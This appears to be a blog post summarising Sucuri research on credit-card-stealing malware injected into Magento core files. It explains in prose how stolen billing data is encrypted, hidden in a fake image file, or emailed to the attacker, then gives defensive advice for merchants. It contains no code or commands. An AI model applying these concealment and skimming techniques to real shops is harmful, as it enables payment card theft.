How Does the Magento Hack Work?
Ecommerce hacks are becoming increasingly common as more and more people choose to shop online. In his latest post on the Sucuri blog, Peter Gramantik highlights a growing trend of attacks on ecommerce sites, specifically by credit card stealers targeting the Magento platform. His findings are summarised here to help you protect your website from the latest Magento hack.
This is by no means an amateur operation. The methods that the attackers are using to cover their tracks are highly sophisticated, and Gramantik admits that there’s no way to tell whether or not the latest threat is affecting you until it’s too late. Small to medium merchants are particularly vulnerable, so it’s crucial that you understand the risks and remain vigilant at all times.
N.B. If you use an ecommerce platform other than Magento, don’t assume that you’re safe. While the examples here might refer to Magento, these kinds of threats can affect any ecommerce site so it’s important to be on your guard regardless of what platform you use.
The attacker appears to be using a vector to exploit a Magento vulnerability, or that of a module or extension commonly associated with Magento. The precise nature of this vulnerability is unclear. What we do know is that a malicious code is injected into the core file, enabling the hacker to steal personal information with every POST request.
This is the process by which the web server stores the data enclosed in a request message, for instance in the case of a file upload or form submission.
How Do They Do This?
Gramantik gives two examples to show how this apparent vulnerability in Magento is being exploited.
In the first, the attacker encrypts the stolen data using the PUBLIC_KEY variable (the protocol used to encrypt plaintext) so that only he can decrypt it. He covers his tracks by utilising a random user agent to make malicious requests difficult to spot, or at least easy to ignore. He removes any remaining traces of activity by setting a custom parameter to store and clear the stolen information.
Once the billing data has been processed, it’s saved in a fake image file. This is modified to make it look as though the file hasn’t been touched for a while and given a fake JPEG header to avoid suspicion. The attacker then downloads the ‘image’ file and decrypts the stolen content using their Private Key.
The code can be placed in any core file that is loaded when the CMS starts. Whereas in the second example, the Checkout Module is targeted with a mailer (i.e. a program that sends email messages).
This time, no data is modified; the mailer simply steals it during the transaction process in such a way that it’s not detected, then sends it to the attacker’s email in plaintext form. The attack is dependent on a particular module. According to Gramantik:
“The attacker knows how the module works and the code it’s built on; all he needed to do was use the module’s own variable in which all the sensitive data is stored unprotected.”
What Are The Risks?
In the words of the Payment Card Industry:
“Small merchants are prime targets for data thieves. It’s your job to protect cardholder data at the point-of-sale. If cardholder data is stolen – and it’s your fault [which it would be in this case] – you could incur fines, penalties, even termination of the right to accept payment cards!”
So What Can You Do?
Merchants need to do everything they can to secure the environment for their processed data. Here’s what you should do:
- Make sure your site is PCI (Payment Card Industry) compliant (which it should be anyway, regardless of the scope of your e-commerce business).
- Look at alternative payment gateways, e.g. PayPal, so that the payment details aren’t actually being entered via your own website.
- Use good, unique passwords for every element of your site – CMS, hosting, payment services and so on.
Finally, to reiterate my earlier point, make sure you’re aware of the risks and keep an eye out for any potential threats. Ensure that you have someone on hand who can deal with security hacks quickly and effectively.
As Gramantik puts it, “Keep your eyes open and stay safe!”
You can read the article in full here.